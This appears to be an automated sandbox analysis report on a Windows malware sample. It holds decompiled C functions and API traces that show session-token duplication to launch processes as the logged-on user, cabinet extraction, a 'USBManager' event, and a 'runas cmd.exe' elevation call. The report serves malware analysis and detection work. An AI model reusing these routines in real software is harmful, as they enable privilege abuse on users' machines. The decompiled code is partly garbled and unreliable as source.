                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00554106
                                                                                                                          • Part of subcall function 00542E64: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E9D
                                                                                                                          • Part of subcall function 00542E64: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0055411B
                                                                                                                        • __invoke_watson.LIBCMT ref: 0055413C
                                                                                                                          • Part of subcall function 0053496B: _memset.LIBCMT ref: 005349F7
                                                                                                                          • Part of subcall function 0053496B: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 00534A15
                                                                                                                          • Part of subcall function 0053496B: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00534A1F
                                                                                                                          • Part of subcall function 0053496B: UnhandledExceptionFilter.KERNEL32(00000001,?,?,00000000), ref: 00534A29
                                                                                                                          • Part of subcall function 0053496B: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 00534A44
                                                                                                                          • Part of subcall function 0053496B: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00534A4B
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000002,00542086,00537225,005343D6,?,005343D6,?), ref: 00542EE8
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,005343D6,?), ref: 00542EFF
                                                                                                                          • Part of subcall function 00542EDB: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,005343D6,?), ref: 00542F14
                                                                                                                          • Part of subcall function 00542EDB: GetProcAddress.KERNEL32(00000000,h$u), ref: 00542F2F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00554150
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00554168
                                                                                                                        • __invoke_watson.LIBCMT ref: 005541DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerEncodeLibraryLoadPointerPresentTerminate_memset
                                                                                                                        • String ID: GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                        • API String ID: 1761029719-1046234306
                                                                                                                        • Opcode ID: 8e36c562a34fa3a8003997fbed7f9861127b98905e41a8df5dd2ace899955a22
                                                                                                                        • Instruction ID: 1bf957bb3930da4bf3bc1a787134835c67a700edfaad2c2e300750af9b68224f
                                                                                                                        • Opcode Fuzzy Hash: 8e36c562a34fa3a8003997fbed7f9861127b98905e41a8df5dd2ace899955a22
                                                                                                                        • Instruction Fuzzy Hash: 83419371D00226AACF34EFB19C99AAE7FB8BA5431AF54452BF801E3150DB7489C4CE91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E6F333610(intOrPtr _a8) {
                                                                                                                        				WCHAR* _v24;
                                                                                                                        				struct _STARTUPINFOW _v96;
                                                                                                                        				struct _PROCESS_INFORMATION _v112;
                                                                                                                        				long _v116;
                                                                                                                        				void* _v120;
                                                                                                                        				void* _t19;
                                                                                                                        				void* _t26;
                                                                                                                        				WCHAR* _t29;
                                                                                                                        				void* _t37;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        
                                                                                                                        				_push(_a8);
                                                                                                                        				_t19 = E6F3334B0();
                                                                                                                        				_t37 = _t19;
                                                                                                                        				_t38 = 0;
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_push(0);
                                                                                                                        					_push(_t37);
                                                                                                                        					_push( &(_v96.lpReserved));
                                                                                                                        					_v96.lpDesktop = 0x20;
                                                                                                                        					_v96.lpReserved = 0;
                                                                                                                        					L6F33C37E();
                                                                                                                        					if(_t19 != 0) {
                                                                                                                        						_v112.dwThreadId = 0x420;
                                                                                                                        					}
                                                                                                                        					_push(0x44);
                                                                                                                        					_push( &(_v96.dwX));
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_push(0x10);
                                                                                                                        					_push( &(_v112.dwProcessId));
                                                                                                                        					_v96.lpDesktop = 0x44;
                                                                                                                        					_v96.dwX = L"Winsta0\\Default";
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t29 = _v24;
                                                                                                                        					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
                                                                                                                        						Sleep(0x1f4);
                                                                                                                        						_t38 = _t38 + 1;
                                                                                                                        						if(_t38 < 0x78) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						L8:
                                                                                                                        						_t26 = _v120;
                                                                                                                        						if(_t26 != 0) {
                                                                                                                        							_push(_t26);
                                                                                                                        							L6F33C378();
                                                                                                                        						}
                                                                                                                        						return CloseHandle(_t37);
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v112.hThread);
                                                                                                                        					CloseHandle(_v112);
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        				return _t19;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F3334B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                          • Part of subcall function 6F3334B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                          • Part of subcall function 6F3334B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D0
                                                                                                                        • CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D7
                                                                                                                        • DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                                        • String ID: $D
                                                                                                                        • API String ID: 826248435-1196817373
                                                                                                                        • Opcode ID: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction ID: 7d98abb27de6b560100ab5b648fe3f8b3eeb76671e6fb0a2d26e1fc012b2fd68
                                                                                                                        • Opcode Fuzzy Hash: 2f2956be3448f8421239fff0721c35f5c2ad7631132987e81a7fe7c3b17f3ee8
                                                                                                                        • Instruction Fuzzy Hash: 762171B2A043A5AFE610DB64CC81F6B77ECEB85754F00490DF690A7280D774E8098BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 50%
                                                                                                                        			E6F3312C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				char _v264;
                                                                                                                        				char _v288;
                                                                                                                        				char _v300;
                                                                                                                        				intOrPtr _v304;
                                                                                                                        				char _v308;
                                                                                                                        				long _v312;
                                                                                                                        				char* _t18;
                                                                                                                        				void* _t20;
                                                                                                                        				char* _t28;
                                                                                                                        				char* _t32;
                                                                                                                        				char* _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				intOrPtr _t43;
                                                                                                                        				long* _t48;
                                                                                                                        
                                                                                                                        				_t18 =  &_v300;
                                                                                                                        				_push(_t18);
                                                                                                                        				_push(0xffffffff);
                                                                                                                        				_push(E6F3310E0);
                                                                                                                        				_push(E6F3310D0);
                                                                                                                        				_push(E6F3310A0);
                                                                                                                        				_push(E6F331070);
                                                                                                                        				_push(E6F331000);
                                                                                                                        				_push(E6F331050);
                                                                                                                        				_push(E6F331030);
                                                                                                                        				_v312 = 0;
                                                                                                                        				L6F33C3A2();
                                                                                                                        				_t40 = _t18;
                                                                                                                        				_t48 =  &(( &_v312)[9]);
                                                                                                                        				if(_t40 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t32 = _a4;
                                                                                                                        					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
                                                                                                                        					_t42 = _t20;
                                                                                                                        					if(_t42 != 0xffffffff) {
                                                                                                                        						_push( &_v288);
                                                                                                                        						_push(_t42);
                                                                                                                        						_push(_t40);
                                                                                                                        						L6F33C39C();
                                                                                                                        						_t48 =  &(_t48[3]);
                                                                                                                        						CloseHandle(_t42);
                                                                                                                        						if(_t20 != 0) {
                                                                                                                        							_t43 = _a12;
                                                                                                                        							if(_t43 != 0) {
                                                                                                                        								_v312 = GetTickCount();
                                                                                                                        								 *0x6f340270 = RtlRandom( &_v312);
                                                                                                                        							}
                                                                                                                        							lstrcpyA( &_v264, _t32);
                                                                                                                        							PathRemoveFileSpecA( &_v264);
                                                                                                                        							PathAddBackslashA( &_v264);
                                                                                                                        							_push( &_v308);
                                                                                                                        							_push(0);
                                                                                                                        							_push(E6F331100);
                                                                                                                        							_push(0);
                                                                                                                        							_push( &_v264);
                                                                                                                        							_v304 = _a8;
                                                                                                                        							_v308 = _t43;
                                                                                                                        							_t28 = PathFindFileNameA(_t32);
                                                                                                                        							_push(_t28);
                                                                                                                        							_push(_t40);
                                                                                                                        							L6F33C396();
                                                                                                                        							_t48 =  &(_t48[7]);
                                                                                                                        							_v312 = _t28;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_push(_t40);
                                                                                                                        					L6F33C390();
                                                                                                                        					return _v312;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • #20.CABINET(6F331030,6F331050,6F331000,6F331070,6F3310A0,6F3310D0,6F3310E0,000000FF,?,00000000,00A56008), ref: 6F3312F8
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6F331323
                                                                                                                        • #21.CABINET(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F33133C
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331347
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33135D
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33136C
                                                                                                                        • lstrcpyA.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F33137D
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331388
                                                                                                                        • PathAddBackslashA.SHLWAPI(?,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F331393
                                                                                                                        • PathFindFileNameA.SHLWAPI(?,?,00000000,6F331100,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6F3313BC
                                                                                                                        • #22.CABINET(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F3313C4
                                                                                                                        • #23.CABINET(00000000,?,?,?,?,?,?,?,00000000,00A56008), ref: 6F3313D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4034828233-0
                                                                                                                        • Opcode ID: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction ID: cd652085a27cf96906f9469b9a9188b614a61b72a552f45f733ec9de68303c36
                                                                                                                        • Opcode Fuzzy Hash: 47e4c7f28988348b9eab2d98d20e0cd3595617a1023614436fd285e0bd34a44e
                                                                                                                        • Instruction Fuzzy Hash: 5731D473D043A46FC620EB65DC44FAFB7ACAB85770F004A1DF59893180EB75E5148BA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits$String_base::_Xlenstd::_
                                                                                                                        • String ID: rd@
                                                                                                                        • API String ID: 1810552321-3749284383
                                                                                                                        • Opcode ID: e6c61859072b801cdf3ab28afa7295efebf5edf704a8ebfc066f3fcec6badcac
                                                                                                                        • Instruction ID: 51698895c2a8d2933d352001331d4ce09a0dab86a7deae28c43ab20f21085153
                                                                                                                        • Opcode Fuzzy Hash: e6c61859072b801cdf3ab28afa7295efebf5edf704a8ebfc066f3fcec6badcac
                                                                                                                        • Instruction Fuzzy Hash: 1AD130B020050AEBCB08CF18CAD4C9AB776FF85300751862AE41AD7695D734FA75CBD9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E6F335060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				char _v256;
                                                                                                                        				char _v264;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				void* _t21;
                                                                                                                        				intOrPtr _t22;
                                                                                                                        				void* _t23;
                                                                                                                        				char* _t24;
                                                                                                                        				void* _t29;
                                                                                                                        
                                                                                                                        				_t24 =  &_v264;
                                                                                                                        				_t18 = _a12;
                                                                                                                        				_t22 = _a8;
                                                                                                                        				_t21 = 0;
                                                                                                                        				if(_t22 != 0 || _t18 != 0) {
                                                                                                                        					_t29 = M6F34050C - _t21; // 0x1
                                                                                                                        					if(_t29 != 0) {
                                                                                                                        						E6F333700("USBManager", 0);
                                                                                                                        						_t24 =  &(_t24[8]);
                                                                                                                        					}
                                                                                                                        					if(_t22 == 0) {
                                                                                                                        						if(_t18 == 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					} else {
                                                                                                                        						_t11 = M6F34057C; // 0x784250
                                                                                                                        						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
                                                                                                                        						_t23 = OpenEventA(2, 0,  &_v256);
                                                                                                                        						if(_t23 == 0) {
                                                                                                                        							goto L10;
                                                                                                                        						} else {
                                                                                                                        							SetEvent(_t23);
                                                                                                                        							CloseHandle(_t23);
                                                                                                                        							return _t21;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					L8:
                                                                                                                        					_push(0);
                                                                                                                        					_t21 = E6F334FE0(_a4);
                                                                                                                        					L9:
                                                                                                                        					CloseHandle(CreateThread(0, 0, E6F332D50, 0, 0, 0));
                                                                                                                        					L10:
                                                                                                                        					return _t21;
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F3350B3
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3350C5
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3350D2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3350D9
                                                                                                                        • CreateThread.KERNEL32 ref: 6F335112
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335119
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                                        • String ID: %s%s%c$Global\$PBx$USBManager
                                                                                                                        • API String ID: 1587369599-1791046797
                                                                                                                        • Opcode ID: e089052f0348f816e5680bda3b51047975159d037f7dc3bd0d1ce99165cf0e02
                                                                                                                        • Instruction ID: f0e2f0cd991706fad068346b22cdb43a5c9a7f315d357111f002c1193962111e
                                                                                                                        • Opcode Fuzzy Hash: e089052f0348f816e5680bda3b51047975159d037f7dc3bd0d1ce99165cf0e02
                                                                                                                        • Instruction Fuzzy Hash: A9113D77F44BA12BE670E6599C46FDA331DEB85B22F004028FF549A280CA66F41947F5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F3334B0() {
                                                                                                                        				void* _t32;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t55;
                                                                                                                        				void* _t58;
                                                                                                                        				void* _t59;
                                                                                                                        				void* _t61;
                                                                                                                        				void* _t64;
                                                                                                                        				void* _t65;
                                                                                                                        
                                                                                                                        				_t59 =  *(_t65 + 0x20);
                                                                                                                        				 *(_t65 + 0x10) = 0;
                                                                                                                        				_t64 = 0;
                                                                                                                        				do {
                                                                                                                        					 *(_t65 + 0x20) = 0;
                                                                                                                        					 *(_t65 + 0x14) = 0;
                                                                                                                        					if(_t59 != 0xffffffff) {
                                                                                                                        						_push(_t65 + 0x14);
                                                                                                                        						_t32 = _t65 + 0x24;
                                                                                                                        						_push(_t32);
                                                                                                                        						_push(8);
                                                                                                                        						_push(_t59);
                                                                                                                        						_push(0);
                                                                                                                        						L6F33C36C();
                                                                                                                        						if(_t32 == 0) {
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							_t35 =  *(_t65 + 0x20);
                                                                                                                        							if( *_t35 == 0) {
                                                                                                                        								 *(_t65 + 0x10) = 1;
                                                                                                                        							}
                                                                                                                        							_push(_t35);
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t33 = _t65 + 0x14;
                                                                                                                        						_push(_t33);
                                                                                                                        						_push(_t65 + 0x24);
                                                                                                                        						_push(1);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						L6F33C372();
                                                                                                                        						if(_t33 == 0) {
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							_t55 =  *(_t65 + 0x14);
                                                                                                                        							_t61 =  *(_t65 + 0x20);
                                                                                                                        							_t53 = 0;
                                                                                                                        							_t35 = _t61;
                                                                                                                        							if(_t55 <= 0) {
                                                                                                                        								L8:
                                                                                                                        								_push(_t61);
                                                                                                                        							} else {
                                                                                                                        								while( *((intOrPtr*)(_t35 + 8)) != 0) {
                                                                                                                        									_t53 = _t53 + 1;
                                                                                                                        									_t35 = _t35 + 0xc;
                                                                                                                        									if(_t53 < _t55) {
                                                                                                                        										continue;
                                                                                                                        									} else {
                                                                                                                        										_push(_t61);
                                                                                                                        									}
                                                                                                                        									goto L13;
                                                                                                                        								}
                                                                                                                        								_t59 =  *_t35;
                                                                                                                        								 *(_t65 + 0x10) = 1;
                                                                                                                        								goto L8;
                                                                                                                        							}
                                                                                                                        							L13:
                                                                                                                        							L6F33C366();
                                                                                                                        							if( *(_t65 + 0x10) != 0) {
                                                                                                                        								_push(_t65 + 0x14);
                                                                                                                        								_push(_t59);
                                                                                                                        								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
                                                                                                                        								L6F33C360();
                                                                                                                        								if(_t35 == 0) {
                                                                                                                        									break;
                                                                                                                        								} else {
                                                                                                                        									 *((intOrPtr*)(_t65 + 0x38)) = 0;
                                                                                                                        									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
                                                                                                                        										break;
                                                                                                                        									} else {
                                                                                                                        										_push(4);
                                                                                                                        										_push(_t65 + 0x14);
                                                                                                                        										 *(_t65 + 0x20) = 0;
                                                                                                                        										L6F33C2EE();
                                                                                                                        										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
                                                                                                                        											CloseHandle( *(_t65 + 0x20));
                                                                                                                        											CloseHandle( *(_t65 + 0x14));
                                                                                                                        											return  *(_t65 + 0x10);
                                                                                                                        										} else {
                                                                                                                        											_t58 =  *(_t65 + 0x20);
                                                                                                                        											 *(_t65 + 0x14) = _t58;
                                                                                                                        											CloseHandle( *(_t65 + 0x14));
                                                                                                                        											return _t58;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								goto L14;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L21:
                                                                                                                        					L14:
                                                                                                                        					Sleep(0x1f4);
                                                                                                                        					_t64 = _t64 + 1;
                                                                                                                        				} while (_t64 < 0x78);
                                                                                                                        				return 0;
                                                                                                                        				goto L21;
                                                                                                                        			}













                                                                                                                        0x6f3335e8
                                                                                                                        0x6f3335cc
                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333545
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f333547
                                                                                                                        0x6f33354c
                                                                                                                        0x6f333552
                                                                                                                        0x6f333553
                                                                                                                        0x6f333565
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                        • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333522
                                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333570
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74784F20), ref: 6F333591
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 6F3335A6
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,00000004,?,?,00000000,74784F20), ref: 6F3335BE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335DD
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335EE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 935900411-0
                                                                                                                        • Opcode ID: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction ID: 61162ad227356fac011b255bfeb04e741221c3df9ebe60a7c4868b1a3e237806
                                                                                                                        • Opcode Fuzzy Hash: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction Fuzzy Hash: A3418372A083959BE700DF55D881E6BB3E9FFC4B14F004A2EF58597180D775E908CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F339C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
                                                                                                                        				intOrPtr _t5;
                                                                                                                        				void* _t15;
                                                                                                                        				char _t21;
                                                                                                                        				struct HWND__* _t26;
                                                                                                                        
                                                                                                                        				_t5 = _a8;
                                                                                                                        				if(_t5 == 0) {
                                                                                                                        					_t26 = _a4;
                                                                                                                        					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
                                                                                                                        					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
                                                                                                                        					BringWindowToTop(_t26);
                                                                                                                        					SetForegroundWindow(_t26);
                                                                                                                        					SendMessageA(_t26, 0x473, 1, 1);
                                                                                                                        					SendMessageA(_t26, 0x46f, 8, 0);
                                                                                                                        					goto L7;
                                                                                                                        				} else {
                                                                                                                        					_t15 = _t5 - 2;
                                                                                                                        					if(_t15 == 0) {
                                                                                                                        						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						if(E6F334230("runas", "cmd.exe", _t21) != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t15 != 0x83f0) {
                                                                                                                        							L7:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32 ref: 6F339CAB
